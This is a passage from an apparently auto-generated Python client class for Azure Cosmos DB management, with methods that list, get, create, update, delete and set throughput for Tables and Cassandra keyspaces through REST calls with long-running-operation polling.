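    #         resource={'throughput': 400})
    #     updated = poller.result()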

    def list_tables(
            self, resource_group_name, account_name, custom_headers=None, raw=False, **operation_config):
        """Lists the Tables under an existing Azure Cosmos DB database account.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: An iterator like instance of Table
        :rtype:
         ~azure.mgmt.cosmosdb.models.TablePaged[~azure.mgmt.cosmosdb.models.Table]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        def prepare_request(next_link=None):
            if not next_link:
                # Construct URL
                url = self.list_tables.metadata['url']
                path_format_arguments = {
                    'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
                    'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
                    'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
                }
                url = self._client.format_url(url, **path_format_arguments)

                # Construct parameters
                query_parameters = {}
                query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

            else:
                url = next_link
                query_parameters = {}

            # Construct headers
            header_parameters = {}
            header_parameters['Accept'] = 'application/json'
            if self.config.generate_client_request_id:
                header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
            if custom_headers:
                header_parameters.update(custom_headers)
            if self.config.accept_language is not None:
                header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

            # Construct and send request
            request = self._client.get(url, query_parameters, header_parameters)
            return request

        def internal_paging(next_link=None):
            request = prepare_request(next_link)

            response = self._client.send(request, stream=False, **operation_config)

            if response.status_code not in [200]:
                exp = CloudError(response)
                exp.request_id = response.headers.get('x-ms-request-id')
                raise exp

            return response

        # Deserialize response
        header_dict = None
        if raw:
            header_dict = {}
        deserialized = models.TablePaged(internal_paging, self._deserialize.dependencies, header_dict)

        return deserialized
    list_tables.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/table/tables'}
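    # Usage sketch (hypothetical resource names): TablePaged is a lazy
    # iterator, so iterating it may issue additional requests to fetch
    # follow-up pages via the next link:
    #
    #     for table in client.list_tables('my-resource-group', 'my-account'):
    #         print(table.name)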

    def get_table(
            self, resource_group_name, account_name, table_name, custom_headers=None, raw=False, **operation_config):
        """Gets the Table under an existing Azure Cosmos DB database account
        with the provided name.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param table_name: Cosmos DB table name.
        :type table_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: Table or ClientRawResponse if raw=true
        :rtype: ~azure.mgmt.cosmosdb.models.Table or
         ~msrest.pipeline.ClientRawResponse
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        # Construct URL
        url = self.get_table.metadata['url']
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
            'tableName': self._serialize.url("table_name", table_name, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct and send request
        request = self._client.get(url, query_parameters, header_parameters)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [200]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        deserialized = None

        if response.status_code == 200:
            deserialized = self._deserialize('Table', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized
    get_table.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/table/tables/{tableName}'}

    def _create_update_table_initial(
            self, resource_group_name, account_name, table_name, resource, options, custom_headers=None, raw=False, **operation_config):
        create_update_table_parameters = models.TableCreateUpdateParameters(resource=resource, options=options)

        # Construct URL
        url = self.create_update_table.metadata['url']
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
            'tableName': self._serialize.url("table_name", table_name, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct body
        body_content = self._serialize.body(create_update_table_parameters, 'TableCreateUpdateParameters')

        # Construct and send request
        request = self._client.put(url, query_parameters, header_parameters, body_content)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [200, 202]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        deserialized = None

        if response.status_code == 200:
            deserialized = self._deserialize('Table', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized

    def create_update_table(
            self, resource_group_name, account_name, table_name, resource, options, custom_headers=None, raw=False, polling=True, **operation_config):
        """Create or update an Azure Cosmos DB Table.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param table_name: Cosmos DB table name.
        :type table_name: str
        :param resource: The standard JSON format of a Table
        :type resource: ~azure.mgmt.cosmosdb.models.TableResource
        :param options: A key-value pair of options to be applied for the
         request. This corresponds to the headers sent with the request.
        :type options: dict[str, str]
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: The poller return type is ClientRawResponse, the
         direct response alongside the deserialized response
        :param polling: True for ARMPolling, False for no polling, or a
         polling object for personal polling strategy
        :return: An instance of LROPoller that returns Table or
         ClientRawResponse<Table> if raw==True
        :rtype:
         ~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.cosmosdb.models.Table]
         or
         ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.cosmosdb.models.Table]]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        raw_result = self._create_update_table_initial(
            resource_group_name=resource_group_name,
            account_name=account_name,
            table_name=table_name,
            resource=resource,
            options=options,
            custom_headers=custom_headers,
            raw=True,
            **operation_config
        )

        def get_long_running_output(response):
            deserialized = self._deserialize('Table', response)

            if raw:
                client_raw_response = ClientRawResponse(deserialized, response)
                return client_raw_response

            return deserialized

        lro_delay = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    create_update_table.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/table/tables/{tableName}'}

    def _delete_table_initial(
            self, resource_group_name, account_name, table_name, custom_headers=None, raw=False, **operation_config):
        # Construct URL
        url = self.delete_table.metadata['url']
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
            'tableName': self._serialize.url("table_name", table_name, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct and send request
        request = self._client.delete(url, query_parameters, header_parameters)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [202, 204]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        if raw:
            client_raw_response = ClientRawResponse(None, response)
            return client_raw_response

    def delete_table(
            self, resource_group_name, account_name, table_name, custom_headers=None, raw=False, polling=True, **operation_config):
        """Deletes an existing Azure Cosmos DB Table.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param table_name: Cosmos DB table name.
        :type table_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: The poller return type is ClientRawResponse, the
         direct response alongside the deserialized response
        :param polling: True for ARMPolling, False for no polling, or a
         polling object for personal polling strategy
        :return: An instance of LROPoller that returns None or
         ClientRawResponse<None> if raw==True
        :rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
         ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        raw_result = self._delete_table_initial(
            resource_group_name=resource_group_name,
            account_name=account_name,
            table_name=table_name,
            custom_headers=custom_headers,
            raw=True,
            **operation_config
        )

        def get_long_running_output(response):
            if raw:
                client_raw_response = ClientRawResponse(None, response)
                return client_raw_response

        lro_delay = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    delete_table.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/table/tables/{tableName}'}
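    # Usage sketch (hypothetical resource names): deletion returns no body,
    # so the returned poller is typically only waited on for completion:
    #
    #     client.delete_table('my-resource-group', 'my-account', 'my-table').wait()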

    def get_table_throughput(
            self, resource_group_name, account_name, table_name, custom_headers=None, raw=False, **operation_config):
        """Gets the RUs per second of the Table under an existing Azure Cosmos DB
        database account with the provided name.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param table_name: Cosmos DB table name.
        :type table_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: Throughput or ClientRawResponse if raw=true
        :rtype: ~azure.mgmt.cosmosdb.models.Throughput or
         ~msrest.pipeline.ClientRawResponse
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        # Construct URL
        url = self.get_table_throughput.metadata['url']
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
            'tableName': self._serialize.url("table_name", table_name, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct and send request
        request = self._client.get(url, query_parameters, header_parameters)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [200]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        deserialized = None

        if response.status_code == 200:
            deserialized = self._deserialize('Throughput', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized
    get_table_throughput.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/table/tables/{tableName}/settings/throughput'}

    def _update_table_throughput_initial(
            self, resource_group_name, account_name, table_name, resource, custom_headers=None, raw=False, **operation_config):
        update_throughput_parameters = models.ThroughputUpdateParameters(resource=resource)

        # Construct URL
        url = self.update_table_throughput.metadata['url']
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
            'tableName': self._serialize.url("table_name", table_name, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct body
        body_content = self._serialize.body(update_throughput_parameters, 'ThroughputUpdateParameters')

        # Construct and send request
        request = self._client.put(url, query_parameters, header_parameters, body_content)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [200, 202]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        deserialized = None

        if response.status_code == 200:
            deserialized = self._deserialize('Throughput', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized
    def update_table_throughput(
            self, resource_group_name, account_name, table_name, resource, custom_headers=None, raw=False, polling=True, **operation_config):
        """Update RUs per second of an Azure Cosmos DB Table.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param table_name: Cosmos DB table name.
        :type table_name: str
        :param resource: The standard JSON format of a resource throughput
        :type resource: ~azure.mgmt.cosmosdb.models.ThroughputResource
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: The poller return type is ClientRawResponse, the
         direct response alongside the deserialized response
        :param polling: True for ARMPolling, False for no polling, or a
         polling object for personal polling strategy
        :return: An instance of LROPoller that returns Throughput or
         ClientRawResponse<Throughput> if raw==True
        :rtype:
         ~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.cosmosdb.models.Throughput]
         or
         ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.cosmosdb.models.Throughput]]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        raw_result = self._update_table_throughput_initial(
            resource_group_name=resource_group_name,
            account_name=account_name,
            table_name=table_name,
            resource=resource,
            custom_headers=custom_headers,
            raw=True,
            **operation_config
        )

        def get_long_running_output(response):
            deserialized = self._deserialize('Throughput', response)

            if raw:
                client_raw_response = ClientRawResponse(deserialized, response)
                return client_raw_response

            return deserialized

        lro_delay = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    update_table_throughput.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/table/tables/{tableName}/settings/throughput'}

    def list_cassandra_keyspaces(
            self, resource_group_name, account_name, custom_headers=None, raw=False, **operation_config):
        """Lists the Cassandra keyspaces under an existing Azure Cosmos DB
        database account.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: An iterator like instance of CassandraKeyspace
        :rtype:
         ~azure.mgmt.cosmosdb.models.CassandraKeyspacePaged[~azure.mgmt.cosmosdb.models.CassandraKeyspace]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        def prepare_request(next_link=None):
            if not next_link:
                # Construct URL
                url = self.list_cassandra_keyspaces.metadata['url']
                path_format_arguments = {
                    'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
                    'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
                    'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
                }
                url = self._client.format_url(url, **path_format_arguments)

                # Construct parameters
                query_parameters = {}
                query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

            else:
                url = next_link
                query_parameters = {}

            # Construct headers
            header_parameters = {}
            header_parameters['Accept'] = 'application/json'
            if self.config.generate_client_request_id:
                header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
            if custom_headers:
                header_parameters.update(custom_headers)
            if self.config.accept_language is not None:
                header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

            # Construct and send request
            request = self._client.get(url, query_parameters, header_parameters)
            return request

        def internal_paging(next_link=None):
            request = prepare_request(next_link)

            response = self._client.send(request, stream=False, **operation_config)

            if response.status_code not in [200]:
                exp = CloudError(response)
                exp.request_id = response.headers.get('x-ms-request-id')
                raise exp

            return response

        # Deserialize response
        header_dict = None
        if raw:
            header_dict = {}
        deserialized = models.CassandraKeyspacePaged(internal_paging, self._deserialize.dependencies, header_dict)

        return deserialized
    list_cassandra_keyspaces.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/cassandra/keyspaces'}

    def get_cassandra_keyspace(
            self, resource_group_name, account_name, keyspace_name, custom_headers=None, raw=False, **operation_config):
        """Gets the Cassandra keyspaces under an existing Azure Cosmos DB database
        account with the provided name.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param keyspace_name: Cosmos DB keyspace name.
        :type keyspace_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: CassandraKeyspace or ClientRawResponse if raw=true
        :rtype: ~azure.mgmt.cosmosdb.models.CassandraKeyspace or
         ~msrest.pipeline.ClientRawResponse
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        # Construct URL
        url = self.get_cassandra_keyspace.metadata['url']
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
            'keyspaceName': self._serialize.url("keyspace_name", keyspace_name, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct and send request
        request = self._client.get(url, query_parameters, header_parameters)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [200]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('CassandraKeyspace', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized
    get_cassandra_keyspace.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/cassandra/keyspaces/{keyspaceName}'}

    def _create_update_cassandra_keyspace_initial(
            self, resource_group_name, account_name, keyspace_name, resource, options, custom_headers=None, raw=False, **operation_config):
        create_update_cassandra_keyspace_parameters = models.CassandraKeyspaceCreateUpdateParameters(resource=resource, options=options)

        # Construct URL
        url = self.create_update_cassandra_keyspace.metadata['url']
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
            'keyspaceName': self._serialize.url("keyspace_name", keyspace_name, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct body
        body_content = self._serialize.body(create_update_cassandra_keyspace_parameters, 'CassandraKeyspaceCreateUpdateParameters')

        # Construct and send request
        request = self._client.put(url, query_parameters, header_parameters, body_content)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [200, 202]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('CassandraKeyspace', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized

    def create_update_cassandra_keyspace(
            self, resource_group_name, account_name, keyspace_name, resource, options, custom_headers=None, raw=False, polling=True, **operation_config):
        """Create or update an Azure Cosmos DB Cassandra keyspace.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param keyspace_name: Cosmos DB keyspace name.
        :type keyspace_name: str
        :param resource: The standard JSON format of a Cassandra keyspace
        :type resource: ~azure.mgmt.cosmosdb.models.CassandraKeyspaceResource
        :param options: A key-value pair of options to be applied for the
         request. This corresponds to the headers sent with the request.
        :type options: dict[str, str]
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: The poller return type is ClientRawResponse, the
         direct response alongside the deserialized response
        :param polling: True for ARMPolling, False for no polling, or a
         polling object for personal polling strategy
        :return: An instance of LROPoller that returns CassandraKeyspace or
         ClientRawResponse<CassandraKeyspace> if raw==True
        :rtype:
         ~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.cosmosdb.models.CassandraKeyspace]
         or
         ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.cosmosdb.models.CassandraKeyspace]]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        raw_result = self._create_update_cassandra_keyspace_initial(
            resource_group_name=resource_group_name,
            account_name=account_name,
            keyspace_name=keyspace_name,
            resource=resource,
            options=options,
            custom_headers=custom_headers,
            raw=True,
            **operation_config
        )

        def get_long_running_output(response):
            deserialized = self._deserialize('CassandraKeyspace', response)

            if raw:
                client_raw_response = ClientRawResponse(deserialized, response)
                return client_raw_response

            return deserialized

        lro_delay = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    create_update_cassandra_keyspace.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/cassandra/keyspaces/{keyspaceName}'}

    def _delete_cassandra_keyspace_initial(
            self, resource_group_name, account_name, keyspace_name, custom_headers=None, raw=False, **operation_config):
        # Construct URL
        url = self.delete_cassandra_keyspace.metadata['url']
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
            'keyspaceName': self._serialize.url("keyspace_name", keyspace_name, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct and send request
        request = self._client.delete(url, query_parameters, header_parameters)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [202, 204]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        if raw:
            client_raw_response = ClientRawResponse(None, response)
            return client_raw_response

    def delete_cassandra_keyspace(
            self, resource_group_name, account_name, keyspace_name, custom_headers=None, raw=False, polling=True, **operation_config):
        """Deletes an existing Azure Cosmos DB Cassandra keyspace.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param keyspace_name: Cosmos DB keyspace name.
        :type keyspace_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: The poller return type is ClientRawResponse, the
         direct response alongside the deserialized response
        :param polling: True for ARMPolling, False for no polling, or a
         polling object for personal polling strategy
        :return: An instance of LROPoller that returns None or
         ClientRawResponse<None> if raw==True
        :rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
         ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        raw_result = self._delete_cassandra_keyspace_initial(
            resource_group_name=resource_group_name,
            account_name=account_name,
            keyspace_name=keyspace_name,
            custom_headers=custom_headers,
            raw=True,
            **operation_config
        )

        def get_long_running_output(response):
            if raw:
                client_raw_response = ClientRawResponse(None, response)
                return client_raw_response

        lro_delay = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    delete_cassandra_keyspace.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/cassandra/keyspaces/{keyspaceName}'}

    def get_cassandra_keyspace_throughput(
            self, resource_group_name, account_name, keyspace_name, custom_headers=None, raw=False, **operation_config):
